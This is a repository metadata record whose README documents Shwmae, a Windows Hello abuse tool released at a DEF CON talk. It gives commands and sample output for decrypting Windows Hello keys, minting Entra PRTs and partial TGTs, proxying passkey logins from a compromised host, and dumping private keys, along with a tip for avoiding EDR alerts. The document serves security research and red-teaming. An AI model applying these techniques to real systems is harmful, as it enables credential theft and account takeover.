{"id":19170570,"url":"https://github.com/ccob/shwmae","last_synced_at":"2025-04-05T07:05:58.724Z","repository":{"id":252470904,"uuid":"775530871","full_name":"CCob/Shwmae","owner":"CCob","description":null,"archived":false,"fork":false,"pushed_at":"2025-01-27T14:36:07.000Z","size":12314,"stargazers_count":147,"open_issues_count":1,"forks_count":12,"subscribers_count":3,"default_branch":"master","last_synced_at":"2025-03-29T06:08:45.058Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"bsd-3-clause","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/CCob.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null},"funding":{"github":"CCob","patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"lfx_crowdfunding":null,"polar":null,"buy_me_a_coffee":null,"thanks_dev":null,"custom":null}},"created_at":"2024-03-21T15:05:03.000Z","updated_at":"2025-03-27T17:28:11.000Z","dependencies_parsed_at":"2024-12-29T19:36:54.678Z","dependency_job_id":null,"html_url":"https://github.com/CCob/Shwmae","commit_stats":null,"previous_names":["ccob/shwmae"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CCob%2FShwmae","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CCob%2FShwmae/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CCob%2FShwmae/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CCob%2FShwmae/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/CCob","download_url":"https://codeload.github.com/CCob/Shwmae/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247299832,"owners_count":20916190,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-09T09:54:29.256Z","updated_at":"2025-04-05T07:05:58.706Z","avatar_url":"https://github.com/CCob.png","language":"C#","funding_links":["https://github.com/sponsors/CCob"],"categories":[],"sub_categories":[],"readme":"# Shwmae\n\nShwmae (shuh-my) is a Windows Hello abuse tool that was released during DEF CON 32 as part of the Abusing Windows Hello Without a Severed Hand talk.  The purpose of the tool is to abuse Windows Hello from a privileged user context.\n\n```\nShwmae \nCopyright (C) 2024 Shwmae\n\n  enum        (Default Verb) Enumerate Windows Hello protectors, keys and credentials\n\n  sign        Sign data using a Windows Hello protected certificate\n\n  prt         Obtain an Entra PRT and partial TGT usable with Rubeus\n\n  webauthn    Create a webserver to proxy WebAuthn requests from an attacking host\n\n  dump        Dump Windows Hello protected keys when backed by software\n\n  help        Display more information on a specific command.\n\n  version     Display version information.\n```\n\nThe tool features several modes of operation.\n\n## Enumeration\n\nWhen no arguments are provided enumeration is the default mode, alternatively you can use the `enum` command.  Enumeration mode will enumerate all Windows Hello containers available, and recursively enumerate all Windows Hello enrolled keys and protectors within the container.  In instances where no TPM is present on the host, a hash is generated for the PIN protector than can be cracked offline using hashcat.  \n\nThe biometric protector will be decrypted automatically but the PIN and Recovery protectors can be decrypted using the `/pin` and `/token` arguments respectively.  Only a single protector needs to be decrypted from each container to allow abuse of the Windows Hello keys within that container.\n\n### Example\n\n```\nShwmae\n\n[+] Decrypted SYSTEM vault policy 4bf4c442-9b8a-41a0-b380-dd4a704ddb28 key: 2f662c4708167c02732ae89cd4681557be8c4059b3eab1716bbf20ac5fd000fdd0c5038ce2fc4c89fd6627f45b8e613611e8282d8f38c08e828c023f6b8f060b\n[+] Decrypted vault policy:\n  Aes128: 3cb7dbc9f920a6df0aab211b67ef673d\n  Aes256: 43642515f325f55c332d14e0295d3ad43dfdb05324fadb7bea687f1a9e0e6ecd\n\nGINGE\\mary.gruber (S-1-5-21-1003644063-402998240-3342588708-1111)\n\n  Provider              : Microsoft Platform Crypto Provider\n  Protected Recovery Key: eyJWZXJzaW9uIjoxLCJQcm90ZWN0ZW...\n  Recovery Key          : Use /token argument to decrypt recovery key\n\n  ** Protectors **\n\n    Type           : Pin\n    Pin Type       : Numeric\n    Length         : 8\n    Decrypted      : Supply /pin argument to attempt decryption\n\n    Type           : Bio\n    Encryption Type: Aes\n    GCM Nonce      : cacf46896844d3f96a55fd8c\n    GCM AuthData   : 01000000200000000c000000b400000010000000cacf46896844d3f96a55fd8c\n    GCM Tag        : f5d6d1c3e35f944038e03013851d6d69\n    Decrypted      : True (Bio Key Correct)\n    ExtPin         : 0f28b81e36b0446cf0deb9ca680c05aeb7b7129ab830936fce3836bbd520ee94\n    DecryptPin     : c63e6e0c199cedff0a086277894f85f510305cef6d4c6ac7efc21bb122f537b1\n    SignPin        : 855b2d32d62a4dafb50d47838d4ce13f8d7d6871718e384d6db22b407ecb05a3\n\n    Type           : Recovery\n    IV             : 49b2c5b8416e5563387e10a8a3d9ae68\n\n  ** Credentials **\n\n    Resource         : WinBio Key Resource\n    SID              : S-1-5-21-1003644063-402998240-3342588708-1111\n    Protector Key    : 59e87b8c63973fb3bfd322016a61e33b59a569c22f9aad22d4c91b6db75bcf52\n\n  ** Keys **\n\n    Name             : login.windows.net/de60a4fa-d583-4eb0-ab66-ce358af8279c/mary.gruber@ethicalchaos.dev\n    Provider         : Microsoft Platform Crypto Provider\n    Key Id           : {B8EF94E6-23EE-42D3-B8DB-BC0AC5EF1824}\n    Key File         : 1d3ddd8ac0d04ae299673cd1ffb19b90cc2e277d.PCPKEY\n    Azure Tenant Id  : de60a4fa-d583-4eb0-ab66-ce358af8279c\n    Azure User       : mary.gruber@ethicalchaos.dev\n    Azure kid        : l5Ov1EluHGcTl/MCwWooU71x0+sHBs78M1Ts9szdNEw=\n\n    Name             : FIDO_AUTHENTICATOR//3aeb002460381c6f258e8395d3026f571f0d9a76488dcd837639b13aed316560_fda42d8889ba587fc7fa202a2e6d91ffad4642abb9c2bd75ea9f906be188925126bdf07d591267672cc2fa79b0750de2437b1d77d6f924af1b4992f4e3527bb0\n    Provider         : Microsoft Platform Crypto Provider\n    Key Id           : {36E18DBB-52AC-4198-BD34-55B3490A575C}\n    Key File         : 979dffb30e1a28d7d6c6c1a5e55c383db8d04dbd.PCPKEY\n    FIDO Relay Party : github.com\n    FIDO Public Key  : RUNTMSAAAADkOpq228W7gXH3VTLeCwScNAyJHFmchJjCZass71QHqCyStIrQWry6m-5XK8HTAdU31UXmkuEI6fjdSmGOtWGR\n    FIDO Cred Id     : qhdzMrPMlH-Fg_sdpNiKhuVpnSd__p1vDN41O3Ip3co\n    FIDO User Id     : _aQtiIm6WH_H-iAqLm2R_61GQqu5wr116p-Qa-GIklEmvfB9WRJnZyzC-nmwdQ3iQ3sdd9b5JK8bSZL041J7sA\n    FIDO User        : mary-gruber\n    FIDO Display Name: mary-gruber\n    FIDO Sign Count  : 2\n\n    Name             : //9DDC52DB-DC02-4A8C-B892-38DEF4FA748F (Vault Key)\n    Provider         : Microsoft Software Key Storage Provider\n    Key Id           : {7418B315-A00B-4113-A0EC-5C51718D11C5}\n    Key File         : fc65330b205c133f00d035ea9e8dfba6_2a155d6c-838c-43f5-b943-b21cc30532d7\n\n    Name             : //CA00CFA8-EB0F-42BA-A707-A3A43CDA5BD9\n    Provider         : Microsoft Software Key Storage Provider\n    Key Id           : {696644C4-EA34-400C-99D2-8B5E38095AA6}\n    Key File         : c4b537d879e21b5d6f797517912be27b_2a155d6c-838c-43f5-b943-b21cc30532d7\n```\n\n## PRT \n\nThe PRT operating mode facilitates generating an initial PRT and renewing existing PRT's via the `prt` command by utilizing any Entra enrolled Windows Hello keys.  If cloud trust is enabled within the tenant, the cloud TGT is decrypted and can be used to authenticate as the user against on premises Active Directory using Rubeus. \n\n### Initial PRT Example\n\n```\nShwmae prt --sid S-1-5-21-1003644063-402998240-3342588708-1111\n[+] Decrypted SYSTEM vault policy 4bf4c442-9b8a-41a0-b380-dd4a704ddb28 key: 2f662c4708167c02732ae89cd4681557be8c4059b3eab1716bbf20ac5fd000fdd0c5038ce2fc4c89fd6627f45b8e613611e8282d8f38c08e828c023f6b8f060b\n[+] Decrypted vault policy:\n  Aes128: 3cb7dbc9f920a6df0aab211b67ef673d\n  Aes256: 43642515f325f55c332d14e0295d3ad43dfdb05324fadb7bea687f1a9e0e6ecd\n[=] Found Azure key with UPN mary.gruber@ethicalchaos.dev and kid l5Ov1EluHGcTl/MCwWooU71x0+sHBs78M1Ts9szdNEw=\n[+] Successfully decrypted NGC key set from protector type Bio\n    Transport Key    : SK-4eed430d-3568-3005-69ca-6967fac4ba9c\n    PRT              : 0.AS8A-qRg3oPVsE6rZs41ivgnnIc7qjhtoBdIsnV6MWmI2TsvABc.AgABAwEAAAA....xDuWvx\n    PRT Session Key  : AQCeykYwMRUg0d.....uOteU9zR8tCw\n    PRT Random Ctx   : 71f7b1a2f4a53a55f39254d3970727104b4d6557040e2b8f\n    PRT Derived Key  : 8314d5d03cfcda825edd2f145083504ccef698beb3beff78658240e96158fee0\n    Partial TGT      : doIGEjCCBg6gAwIBBaEDAgEWooIE4TC...TZaowUCAwwWuw==\n```\n\n### Renewal PRT Example\n\nFor PRT renewals the PRT and session key are required from the initial PRT request.\n\n```Shwmae prt --sid S-1-5-21-1003644063-402998240-3342588708-1111 -r --prt 0.AS8A-qRg3oPVsE6rZ....RRjDl --session-key AQCeykYwMR.....9zR8tCw\n[+] Decrypted SYSTEM vault policy 4bf4c442-9b8a-41a0-b380-dd4a704ddb28 key: 2f662c4708167c02732ae89cd4681557be8c4059b3eab1716bbf20ac5fd000fdd0c5038ce2fc4c89fd6627f45b8e613611e8282d8f38c08e828c023f6b8f060b\n[+] Decrypted vault policy:\n  Aes128: 3cb7dbc9f920a6df0aab211b67ef673d\n  Aes256: 43642515f325f55c332d14e0295d3ad43dfdb05324fadb7bea687f1a9e0e6ecd\n    Transport Key    : SK-4eed430d-3568-3005-69ca-6967fac4ba9c\n    PRT              : 0.AS8A-qRg3oPVsE6rZs41ivgnnIc7qjhtoBdIsnV6MWmI2TsvABc.AgABAwEAAAA....xDuWvx\n    PRT Session Key  : AQCeykYwMRUg0d.....uOteU9zR8tCw\n    PRT Random Ctx   : 71f7b1a2f4a53a55f39254d3970727104b4d6557040e2b8f\n    PRT Derived Key  : 8314d5d03cfcda825edd2f145083504ccef698beb3beff78658240e96158fee0\n    Partial TGT      : doIGEjCCBg6gAwIBBaEDAgEWooIE4TC...TZaowUCAwwWuw==\n```\n\n## WebAuthn\n\nThe WebAuthn operating mode sets up a simple web API via the `webauthn` command that will accept WebAuthn assertion requests from the ShwmaeExt web browser extension from another host.    \n\nOnce the WebAuthn HTTP listener is setup on a compromised host, which defaults to listening on port 8000, you can install the ShwmaeExt within an attacking browser.  Once you set the listener URL within the extension, you can login via Passkey authentication using any credentials available from the compromised host.  You can find the exploded extension inside the `ShwmaeExt` folder.\n\n### Example\n\n```Shwmae webauthn\n[+] Decrypted SYSTEM vault policy 4bf4c442-9b8a-41a0-b380-dd4a704ddb28 key: 2f662c4708167c02732ae89cd4681557be8c4059b3eab1716bbf20ac5fd000fdd0c5038ce2fc4c89fd6627f45b8e613611e8282d8f38c08e828c023f6b8f060b\n[+] Decrypted vault policy:\n  Aes128: 3cb7dbc9f920a6df0aab211b67ef673d\n  Aes256: 43642515f325f55c332d14e0295d3ad43dfdb05324fadb7bea687f1a9e0e6ecd\n[=] WebAuthn proxy running, press enter to exit\n```\n\n## Dump\n\nThe `dump` command can be used for extracting Windows Hello backed private keys that are backed by the Software Key Storage provider.  You cannot use this mode to extract keys that are backed by the Platform Key Storage Provider.\n\n### Example\n\n```\nShwmae.exe dump --key-name login.windows.net/de60a4fa-d583-4eb0-ab66-ce358af8279c/mary.gruber@ethicalchaos.devst\n```\n\n## Sign\n\nThe `sign` command can be used for signing arbitrary data with a specific key.  This mode can be useful in scenarios where no specific integration exists within the tool.\n\nThe `--key-name` argument is used to target the specific Windows Hello key pair to use and the `--data` argument is used to calculate the signature.  The data should be presented as a Base64 encoded string, but the string is first decoded to binary prior to generating the signature.  The binary signature is converted to Base64 and printed to the console.  \n\n### Example\n\n```\nShwmae.exe sign --key-name login.windows.net/de60a4fa-d583-4eb0-ab66-ce358af8279c/mary.gruber@ethicalchaos.dev --data AAAAAA\n[+] Decrypted SYSTEM vault policy 4bf4c442-9b8a-41a0-b380-dd4a704ddb28 key: 2f662c4708167c02732ae89cd4681557be8c4059b3eab1716bbf20ac5fd000fdd0c5038ce2fc4c89fd6627f45b8e613611e8282d8f38c08e828c023f6b8f060b\n[+] Decrypted vault policy:\n  Aes128: 3cb7dbc9f920a6df0aab211b67ef673d\n  Aes256: 43642515f325f55c332d14e0295d3ad43dfdb05324fadb7bea687f1a9e0e6ecd\n[=] Found key in container 1f75e567-63ab-4f90-b1f6-cfc30b399085 for user GINGE\\mary.gruber (S-1-5-21-1003644063-402998240-3342588708-1111)\n[+] Successfully decrypted NGC key set from protector type Bio\n[+] Success:\nMogfSZKrtYs9kfy0jPrVODpu4/eJfXHvGu+TQJzf9JG9JMug2+rmG7zEBuzUunMVy7jyHSBwv1eQ78yQr/G5y0VfoeKYnW5UbKuO9ZnImTuIFem4RE7RhQ84Pm4BgEQ3W16ebcf5CIHnIOZpOec6nbh7WZBIi2AG8N5fWK9itWA1Uk7j1TAFO7gCfAbrE9O6KiMLe4AAdw2vjR5s9RVqw1MdacWKOBDwGVm+VmHY6kYXSCovyWJ+ESoi75fRfRSgyPcHViNOP77pnUDOeMfl9nsE6C0UEKSCvJ+GGJy3u5uiK5fC1w73TG8s/Y2O6YSJpjnXqC5ZJhrE/vLtJNtGWg==\n```\n\n## DPAPI\n\nSome EDR's will alert when the DPAPI keys are dumped via reading LSA secrets.  If you have obtained the SYSTEM account DPAPI keys via other means, these can be input via the `--system-dpapi` and `--machine-dpapi` keys respectively using a hex string representing a 16 byte key (32 characters).  \n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fccob%2Fshwmae","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fccob%2Fshwmae","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fccob%2Fshwmae/lists"}